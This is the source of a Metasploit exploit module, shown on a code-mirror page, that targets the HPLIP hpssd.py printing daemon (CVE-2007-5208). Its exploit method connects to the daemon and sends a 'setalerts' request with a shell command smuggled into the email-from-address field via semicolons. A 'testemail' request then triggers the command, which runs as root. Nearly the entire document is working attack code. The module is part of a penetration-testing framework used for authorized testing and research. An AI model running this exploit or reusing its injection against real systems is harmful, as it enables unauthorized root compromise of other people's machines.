CoCalc -- hplip_hpssd

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/misc/hplip_hpssd_exec.rb
¹⁹⁵⁰⁰ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'HPLIP hpssd.py From Address Arbitrary Command Execution',
16
        'Description' => %q{
17
          This module exploits a command execution vulnerable in the hpssd.py
18
          daemon of the Hewlett-Packard Linux Imaging and Printing Project.
19
          According to MITRE, versions 1.x and 2.x before 2.7.10 are vulnerable.
20

21
          This module was written and tested using the Fedora 6 Linux distribution.
22
          On the test system, the daemon listens on localhost only and runs with
23
          root privileges. Although the configuration shows the daemon is to
24
          listen on port 2207, it actually listens on a dynamic port.
25

26
          NOTE: If the target system does not have a 'sendmail' command installed,
27
          this vulnerability cannot be exploited.
28
        },
29
        'Author' => [ 'jduck' ],
30
        'License' => MSF_LICENSE,
31
        'References' => [
32
          [ 'CVE', '2007-5208' ],
33
          [ 'OSVDB', '41693' ],
34
          [ 'BID', '26054' ],
35
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=319921' ],
36
          [ 'URL', 'https://bugzilla.redhat.com/attachment.cgi?id=217201&action=edit' ]
37
        ],
38
        'Platform' => ['unix'],
39
        'Arch' => ARCH_CMD,
40
        'Privileged' => true,
41
        'Payload' => {
42
          'Space' => 1024,
43
          'DisableNops' => true,
44
          'Compat' =>
45
                        {
46
                          'PayloadType' => 'cmd',
47
                          # *_perl and *_ruby work if they are installed
48
                          # inetd isn't used on FC6/7 (xinetd is)
49
                          # netcat doesn't have -e by default
50
                        }
51
        },
52
        'Targets' => [
53
          [ 'Automatic (hplip-1.6.7-4.i386.rpm)', {} ]
54
        ],
55
        'DefaultTarget' => 0,
56
        'DisclosureDate' => '2007-10-04',
57
        'Notes' => {
58
          'Reliability' => UNKNOWN_RELIABILITY,
59
          'Stability' => UNKNOWN_STABILITY,
60
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
61
        }
62
      )
63
    )
64

65
    register_options(
66
      [
67
        Opt::RPORT(2207),
68
      ]
69
    )
70
  end
71

72
  def exploit
73
    connect
74

75
    # cmd = "nohup " + payload.encoded
76
    cmd = payload.encoded
77

78
    username = 'root'
79
    toaddr = 'nosuchuser'
80

81
    # first setalerts
82
    print_status("Sending 'setalerts' request with encoded command line...")
83
    msg = "username=#{username}\n" +
84
          "email-alerts=1\n" +
85
          # "email-from-address=`#{cmd}`\n" +
86
          "email-from-address=x;#{cmd};\n" +
87
          "email-to-addresses=#{toaddr}\n" +
88
          "msg=setalerts\n"
89
    sock.put(msg)
90

91
    # next, the test email command
92
    print_status("Sending 'testemail' request to trigger execution...")
93
    msg = "msg=testemail\n"
94
    sock.put(msg)
95
  end
96
end
97

98
Product

Resources

Company
